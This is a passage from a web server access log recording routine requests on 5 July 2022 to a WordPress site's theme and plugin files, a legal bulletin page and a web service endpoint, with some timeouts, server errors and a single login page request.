65.154.226.220 - - [05/Jul/2022:04:22:38 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
65.154.226.220 - - [05/Jul/2022:04:22:39 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
65.154.226.220 - - [05/Jul/2022:04:22:39 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
222.175.199.222 - - [05/Jul/2022:04:22:40 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [05/Jul/2022:04:25:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:04:24:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
3.236.221.156 - - [05/Jul/2022:04:26:09 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:04:25:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55492
207.46.13.8 - - [05/Jul/2022:04:29:34 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 385879
216.245.221.92 - - [05/Jul/2022:04:30:35 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [05/Jul/2022:04:30:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 500 253
201.245.192.253 - - [05/Jul/2022:04:30:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 500 253
172.22.2.4 - - [05/Jul/2022:04:30:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:04:30:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60561
216.245.221.92 - - [05/Jul/2022:04:35:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:04:35:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:04:36:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53939
216.245.221.92 - - [05/Jul/2022:04:40:35 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [05/Jul/2022:04:40:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 500 253
201.245.192.253 - - [05/Jul/2022:04:40:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 500 253
185.119.81.103 - - [05/Jul/2022:04:42:29 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [05/Jul/2022:04:42:30 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
172.22.2.4 - - [05/Jul/2022:04:41:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:04:42:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58071
216.245.221.92 - - [05/Jul/2022:04:45:35 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [05/Jul/2022:04:46:43 -0500] "-" 408 -
65.154.226.169 - - [05/Jul/2022:04:48:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
65.154.226.169 - - [05/Jul/2022:04:48:55 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
65.154.226.169 - - [05/Jul/2022:04:48:55 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
65.154.226.169 - - [05/Jul/2022:04:48:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
65.154.226.169 - - [05/Jul/2022:04:48:55 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
